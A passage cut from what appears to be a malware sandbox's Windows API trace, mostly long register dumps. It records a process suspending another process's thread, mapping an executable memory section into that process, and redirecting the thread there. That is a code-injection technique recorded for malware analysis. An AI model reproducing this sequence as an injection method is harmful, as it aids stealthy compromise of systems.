SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0171.464] NtResumeThread (in: ThreadHandle=0x138, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0171.465] NtClose (Handle=0xb4) returned 0x0 [0171.465] NtClose (Handle=0x138) returned 0x0 [0171.471] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x104c, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x138) returned 0x0 [0171.471] NtQueryInformationProcess (in: ProcessHandle=0x138, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0171.471] NtQueryInformationProcess (in: ProcessHandle=0x138, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0171.471] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x318000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0171.472] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0171.481] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x1050) | out: ThreadHandle=0xdea64*=0xb4) returned 0x0 [0171.481] NtSuspendThread (in: ThreadHandle=0xb4, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0171.481] NtMapViewOfSection (in: SectionHandle=0xc4, ProcessHandle=0x138, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x2170000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0171.492] NtGetContextThread (in: ThreadHandle=0xb4, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x318000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7567895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0171.495] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x140) returned 0x0 [0171.495] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0x155200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x7300000, SectionOffset=0x0, ViewSize=0xde6ac*=0x156000) returned 0x0 [0171.516] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0x138, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0x155200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x2b40000, SectionOffset=0x0, ViewSize=0xde6e8*=0x156000) returned 0x0 [0171.553] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x7300000) returned 0x0 [0171.565] NtClose (Handle=0x140) returned 0x0 [0171.565] NtSetContextThread (ThreadHandle=0xb4, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x318000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x2c02707, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, 